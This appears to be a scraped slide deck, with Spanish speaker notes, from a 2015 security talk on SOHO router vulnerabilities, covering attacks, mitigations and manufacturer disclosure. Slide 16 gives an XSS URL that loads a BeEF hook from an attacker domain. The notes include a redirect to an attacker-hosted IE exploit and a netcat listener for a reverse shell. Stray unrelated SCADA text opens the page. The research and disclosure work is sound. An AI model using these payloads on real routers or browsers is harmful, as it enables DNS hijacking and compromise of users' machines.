power system scada applications and uses
power system scada applications and usespower system scada applications and uses
power system scada applications and uses
 

Soho routers: swords and shields CyberCamp 2015

  • 1.
  • 2. Swords & Shields SOHO Routers: Álvaro Folgado, José Antonio Rodríguez, Iván Sanz
  • 3. About us… 3 Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global.
  • 5. Real World Attacks  Example 1 – Dictionary for DNS Hijacking via CSRF 5
  • 6. Real World Attacks  Example 2 – Phishing website 6
  • 7. Real World Attacks 7  Example 3 – Linux/Moose Malware
  • 8. Common security problems  Services  Too many. Mostly useless. □Increases attack surfaces  Insecure 8
  • 9. Common security problems  Default credentials  Public and well-known for each model  Non randomly generated  Hardly ever modified by users 9 45% 27% 5% 5% 18% User / Password 1234 / 1234 admin / admin [blank] / admin admin / password vodafone / vodafone
  • 10. Common security problems  Multiple user accounts  Also with public default credentials  Mostly useless for users  Almost always hidden for end-users □Passwords for these accounts are never changed 10
  • 12. Bypass Authentication  Allows unauthenticated attackers to carry out router configuration changes  Locally and remotely  Exploits:  Improper file permissions: Web configuration interface  Service misconfiguration: SMB and Twonky Media Server 12  Persistent DoS / Restore router to default settings without requiring authentication  Exploiting the Twonky Media Server Video Demos #1 & #2
  • 13. Cross Site Request Forgery  Change any router configuration settings by sending a specific malicious link to the victim  Main goal  DNS Hijacking  Requires embedding login credentials in the malicious URL  Attack feasible if credentials have never been changed  Google Chrome does not pop-up warning 13
  • 14. Cross Site Request Forgery  Suspicious link, isn't it?  URL Shortening Services  Create a malicious website 14
  • 15. Persistent Cross Site Scripting  Inject malicious script code within the web configuration interface  Goals  Session Hijacking  Browser Infection 15
  • 16. Persistent Cross Site Scripting  Browser Exploitation Framework is a great help  Input field character length limitation  BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> 16
  • 17. Unauthenticated Cross Site Scripting  Script code injection is performed locally without requiring any login process  Send a DHCP Request PDU containing the malicious script within the hostname parameter  The malicious script is injected within Connected Clients (DHCP Leases) table 17
  • 19. Unauthenticated Cross Site Scripting  Always try harder 19
  • 20. Privilege Escalation  User without administrator rights is able to escalate privileges and become an administrator  Shows why multiple user accounts are unsafe 20  Privilege Escalation via FTP Video Demo #3
  • 21. Backdoor  Hidden administrator accounts  Completely invisible to end users  But allows attackers to change any configuration setting 21
  • 22. Information Disclosure  Obtain critical information without requiring any login process  WLAN password  Detailed list of currently connected clients  Hints about router's administrative password  Other critical configuration settings 22
  • 24. Universal Plug and Play  Enabled by default on several router models  Allows application to execute network configuration changes such as opening ports  Extremely insecure protocol  Lack of an authentication process  Awful implementations  Main goals  Open critical ports for remote WAN hosts  Persistent Denial of Service  Carry out other configuration changes 24
  • 25. Universal Plug and Play  Locally  Miranda UPnP tool 25
  • 26. Universal Plug and Play  Remotely  Malicious SWF file 26
  • 27. Attack vectors  Locally  Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly  Remotely  The attacker is outside of the victim's LAN 27
  • 28. Social Engineering is your friend  For link-based remote attacks  XSS, CSRF and UPnP  Social Networks = Build the easiest botnet ever!  Phishing emails = Targeted attacks 28
  • 29. 29  DNS Hijacking via CSRF Live Demo #1  Unauthenticated Cross Site Scripting via DHCP Request Live Demo #2  Reflected XSS + client-side attack to get Reverse Shell Live Demo #3  Bypass Authentication using SMB Symlinks Live Demo #4
  • 30. 30  Using a Reflected Cross Site Scripting to get a Reverse Shell on victim's computer  Exploits an Internet Explorer client-side vulnerability: CVE-2012-1876 Live Demo #3: Details
  • 32. Mitigations: End users  Users start with a broken shield  Limited configuration settings  Several attacks cannot be stopped  Mitigations only work for specific models  Not as easy as buying a brand new router  No antivirus is going to protect you 32
  • 33. Mitigations: End users  Where to start?  Identify your router model  Look for router credentials  Get into the advanced configuration interface 33
  • 34. Mitigations: End users  General recommendations  Only log into the web interface when needed □ Logout (if possible) / Wipe browser's cache after finishing  Change your router's administrative password 34
  • 35. Mitigations: End users  General recommendations  Check your DNS servers on a weekly basis 35
  • 36. Mitigations: End users  General recommendations  Do not trust shortened links  Be careful when browsing the web interface 36
  • 37. Mitigations: End users  Multiple user accounts  Try to delete any other administrative account  At least, change their passwords, if possible 37
  • 38. Video Demo #4  Mitigating Privilege Escalation and account-related attacks 38
  • 39. Mitigations: End users  Services  Disable any unused service if given the chance □FTP and SMB □Media Servers: Twonky □UPnP □If local risk, DHCP  It does not always work… 39
  • 40. Mitigations: End users  Firmware  Update to the latest version □Manufacturer might have not fixed any issues  How? 40
  • 41. Mitigations: End users  Custom Firmware Images  For advanced users  More configuration settings  Might have security flaws as well 41
  • 42. Mitigations: Manufacturers  Listen to what security researchers have to say  Do not include useless services  Specially for ISP SOHO routers  At least, make it feasible to completely shut them down  Critical ports closed to WAN by default  At least 21, 22, 23, 80 and 8000/8080 42
  • 43. Mitigations: Manufacturers  Do not include multiple user accounts  Design a safer alternative to UPnP  Avoid using unsafe protocols  HTTP. Telnet. FTP. HTTPS. SSH. SFTP.  Randomly generate user credentials 43 Admin Password Serial Number MAC Address Manufact. Date
  • 44. Mitigations: Manufacturers  XSS  Check every input field within router's web interface  Sanitize DHCP hostname parameters  Content Security Policies 44
  • 45. Mitigations: Manufacturers  CSRF  Tokens… that work 45
  • 46. Mitigations: Manufacturers  Bypass Authentication & Information Disclosure  Check for improper file permissions and public debug messages  Service-related  Check for possible wrong service configuration (e.g.: FTP, SMB) 46
  • 49. Manufacturers' response  Average 2-3 emails sent to each manufacturer  Most of them unreplied... 7 months later  Number of vulnerabilities fixed: 0 49
  • 51. Results  More than 60 vulnerabilities have been discovered  22 router models affected  11 manufacturers affected 51
  • 52. 52 0 2 4 6 8 10 12 14 16 18 Disclosed vulnerabilities per manufacturer Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
  • 53. 53 21% 15% 20% 8% 2% 3% 2% 6% 23% XSS Unauthenticated XSS CSRF Denial of Service Privilege Escalation Information Disclosure Backdoor Bypass Authentication UPnP Vulnerabilities by types
  • 54. Conclusion  Has SOHO router security improved?  Hell NO!  Serious security problems  Easy to exploit  With huge impact  Millions of users affected  PLEASE, START FIXING SOHO ROUTER SECURITY 54
  • 55. 55 Álvaro Folgado Rueda · alvfolrue@gmail.com José A. Rodríguez García · joseantorodriguezg@gmail.com Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com Thank you! Q&A Time

Editor's Notes

  1. Ejemplo 1: Ataque a routers (sobre todo en Brasil). Hace unos años. Afectó a decenas de miles de usuarios. Es un script sencillo que lo único que hace es intentar explotar un CSRF con las contraseñas por defecto del usuario para cambiar el DNS En la figura de abajo, se observa el diccionario que contiene los diferentes intentos de CSRF a probar
  2. Ejemplo 2: Ataque a routers (sobre todo en Brasil y del ISP GVT). Phishing que redirecciona a una página web maliciosa que ejecuta scripts por detrás Inyecta las contraseñas en la URL. Si no consigue adivinar la contraseña, te la pide Como se ve, en la mayoría de casos explotan cosas muy sencillas: fallos humanos o que no se cambie la contraseña, para modificar el DNS (objetivo final)
  3. Ejemplo 3: Moose se distribuye como un ejecutable convencional para Linux en forma de binario ELF. Este gusano crea automáticamente 36 procesos en los dispositivos que infecta. La mayoría de estos procesos están diseñados especialmente para infectar a otros dispositivos que se conecten a la misma red y poder tener así una mayor actividad. Los procesos que no son utilizados para infectar otros equipos se centran principalmente en el robo de paquetes y cookies HTTP no cifradas que puedan contener información personal sobre los usuarios como datos bancarios, credenciales de acceso, etc. Este gusano también conecta con un servidor Proxy para visitar cuentas sociales o cargar vídeos de YouTube y otras plataformas y así obtener remuneración económica, aumentar el número de visitar y ganar protagonismo en estas redes sociales.
  4. MODIFICAR: Poner imagenes SMB Poner Video Demos WEB Y USB TWONKY
  5. PONER UNA IMAGEN MEJOR DE BEEF
  6. Explicar el ataque. Se envia un enlace a la victima. EXPLICAR EL ENLACE Y SUS PARTES ANTES DE HACER LA DEMO. Lo que estamos haciendo es ejecutar codigo Javascript que lo que hace es abrir una nueva window para acceder al recurso hosteado en el servidor del atacante (el exploit) La maquina del atacante (192.168.1.35, aunque en la realidad seria un NoIPDomain remoto) hostea un servidor web, con un archivo llamado 1 en el directorio raiz, que contiene el exploit. Explicar ligeramente el exploit y a las versiones de IE que afecta (7 a 10 preview). Podriamos usar otra para Chrome. Esto nos permite ya explotar la maquina y no solo el router. nc –lvp 4444 Otras notas: Estamos inyectando esto en 2 partes: <script>window.location.assign("http://192.168.1.35/1");</script>
  7. Pocas opciones de configuración. Muchos ataques no son mitigables. Las mitigaciones que vamos a dar aquí solo funcionan para algunos modelos en concreto. Para otros no se puede hacer. CADA ROUTER ES UN MUNDO. No es tan facil como comprar un router nuevo: los highend pueden tener incluso mas vulnerabilidades auqnue suelen parchear mas freceuntemente Ningun antivirus detecta estos ataques. Hablar de que algunas empresas se intentaron aprovechar de nuestro articulo.
  8. Buscar el modelo: En la pegatina viene. Buscar credenciales: O en la pegatina (a veces no viene), o en internet OJO. ALGUNAS CREDENCIALES NO SON LAS DE LA INTERFAZ CON MAXIMOS PRIVILEGIOS. GOOGLEAR
  9. Solo loggearnos cuando vayamos a hacer cambios: Si nos hacen CSRF o Persistent XSS mientras estamos loggeados, nos inyectan. Nunca navegar despues de estar loggeados (logout o wipe cache), porque podemos acceder a enlace malicioso y ser atacados Cambiar Password: Con esto tan simple, mitigamos algunos de los CSRF y Persistent XSS que necesiten inyectar credenciales (pueden seguir utilizando cuentas ocultas)
  10. Uno de los mayores objetivos de los atacantes es cambiar los DNS. Comprobarlos en el propio Router. Pero tambien en el OS (Linux o Windows)
  11. Cuidado al navegar por la web del router, que nos puede salir un regalito.
  12. Primeras screens (AW4062) Permite modificar la password de user. En muchos no se puede Pero tiene una cuenta oculta, que no permite borrar Segundas screens (VH4032N): En la interfaz de Vodafone, solo te deja modificar el usuario vodafone Hay muchas cuentas de usuario Terceras screens (RTA01N): Aparentemente, te deja cambiar todo, todo muy bien hecho para administrar las cuentas de usuario Pero luego, no te sale el backdoor NO SE PUEDE ELIMINAR NI MITIGAR ESTE BACKDOOR
  13. Si puedes, deshabilita. Muchas veces, ni puedes Y las veces que puedes, a veces no se cambia bien Ejemplos: Deshabilitar FTP, o hacerlo LAN Only Deshabilitar el Twonky. Cuidado desde qué interfaz Deshabilitar UPnP. Puede seguir respondiendo
  14. Como hacerlo? A veces, simplemente basta con restaurar el router a ajustes de fabrica. Lo pueden hacer por usuarios ocultos+FTP / TR-069 Descargarla de algun sitio (cuidado) Contactar con el ISP a través de sus foros oficiales Sometimes, by just restoring the router to default Contact your ISP (forums are useful) Download it from somewhere (be careful)
  15. Por ejemplo. UPnP vulnerable en algunos de estos. XSS y CSRF en todos. OpenWRT: DD-WRT: Tuvo hace tiempo varias gordas hasta la v24. Tambien DNS Rebinding, Information Disclosure. PFSense: Remote Code Execution, Arbitrary File Deletion
  16. Proposicion de algoritmo para la generacion de la clave de admin. Que dependa de varias cosas que se saben de fabrica y que no cuesta meterlas en el router. Si solo depende de la MAC, al ser facilmente averiguable, si terminan averiguando el algoritmo con reversing, luego pueden lanzar un generador de keys, como pasa con las claves del Wi-Fi. Pero al depender de otros parametros a los que no se tiene acceso desde fuera, es imposible descifrar la pass aunque se conozca el algoritmo (un atacante externo NUNCa va a conocer la fecha de fabricacion del router y el numero de serie del mismo) Pon SSL en tu vida
  17. Decir que esta frase es muy importante
  18. Generar tokens aleatorios: Dices que hay un ejemplo para el token en las figuras. Luego vas pasando el resto y LEYENDO la frase en negrita en español.
  19. Valores recomendados para el smb.conf: Asi evitariamos que usuarios sin autenticar/no validos se loggearan Y que cualquier usuario pudiera crear enlaces simbolicos fuera de /var/usb Buena configuracion para poder compartir cosas a traves del router
  20. HABLAR DE QUE ESTAMOS CON INCIBE PARA…
  21. RETOCAR GRAFICO